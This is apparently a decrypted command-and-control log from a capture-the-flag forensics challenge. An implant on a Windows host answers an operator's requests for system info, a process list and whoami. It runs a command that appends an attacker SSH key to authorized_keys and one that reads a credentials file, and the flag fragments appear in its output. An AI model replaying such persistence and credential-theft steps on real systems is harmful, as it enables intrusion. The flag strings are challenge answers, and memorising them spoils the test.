rq : 1BhuY4/niTopIBHAN6vvmQ==
infoback;0;10.10.10.22|SRV01|SRV01\svc01|Windows 10 Enterprise Evaluation|0.1.6.1
rq : procview;
procview;svchost?2060;svchost?5316;ApplicationFrameHost?4920;csrss?388;svchost?1372;svchost?832;VBoxTray?2748;fontdrvhost?684;services?576;svchost?3528;lsass?584;svchost?6872;svchost?1552;spoolsv?1748;VBoxService?1156;svchost?760;conhost?4108;svchost?1152;dllhost?6864;svchost?2528;svchost?1936;Memory Compression?1428;RuntimeBroker?4692;svchost?4112;svchost?1932;svchost?748;smss?284;svchost?1140;svchost?6852;svchost?2320;MicrosoftEdge?5076;svchost?1332;svchost?740;svchost?3888;conhost?4896;dwm?340;java?6052;svchost?928;svchost?3488;YourPhone?1320;svchost?1516;dllhost?4204;SearchUI?4664;svchost?328;winlogon?524;SgrmBroker?6628;svchost?2096;svchost?1504;cmd?2488;svchost?1304;NisSrv?2336;MicrosoftEdgeSH?5636;svchost?1104;browser_broker?4592;svchost?1100;svchost?5284;explorer?4052;svchost?1164;svchost?2076;svchost?1680;aQ4caZ?7148;svchost?692;svchost?100;dumpcap?3516;MsMpEng?2260;RuntimeBroker?4820;svchost?1272;Microsoft.Photos?6392;svchost?3436;fontdrvhost?676;cmd?84;taskhostw?3628;RuntimeBroker?6188;RuntimeBroker?1384;java?7028;MicrosoftEdgeCP?5592;svchost?1256;svchost?3816;csrss?464;Registry?68;sihost?3416;SecurityHealthSystray?3156;svchost?6368;svchost?6564;wininit?456;ctfmon?3940;svchost?1636;SecurityHealthService?844;svchost?1040;svchost?2024;svchost?6980;svchost?1628;svchost?1824;svchost?1288;wlms?2216;RuntimeBroker?5564;svchost?5364;svchost?1620;svchost?2012;svchost?396;svchost?6540;RuntimeBroker?6780;WindowsInternal.ComposableShell.Experiences.TextInput.InputApp?2200;svchost?1604;svchost?788;svchost?1400;uhssvc?6824;SearchIndexer?5532;svchost?4940;svchost?3560;svchost?1392;svchost?1588;svchost?1784;wrapper?2176;svchost?2568;ShellExperienceHost?4536;System?4;conhost?2368;OneDrive?1184;svchost?1472;Idle?0;
rq : cmd;C:;hostname
cmd;C:;srv01
rq : cmd;C:;whoami
cmd;C:;srv01\svc01
rq : cmd;C:;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:\Users\svc01\.ssh\authorized_keys
cmd;C:;
rq : cmd;C:;dir C:\Users\svc01\Documents
cmd;C:; Volume in drive C is Windows 10
Volume Serial Number is B4A6-FEC6
Directory of C:\Users\svc01\Documents
02/28/2024 07:13 AM <DIR> .
02/28/2024 07:13 AM <DIR> ..
02/28/2024 05:14 AM 76 credentials.txt
1 File(s) 76 bytes
2 Dir(s) 24,147,230,720 bytes free
rq : cmd;C:;type C:\Users\svc01\Documents\credentials.txt
_h45_b33n_r357
rq : lsdrives
lsdrives;C:|
rq : lsfiles
rq : lsfiles-C:
rq : lsfiles-C:
lsfiles;C:temp;aQ4caZ.exe?1?29184|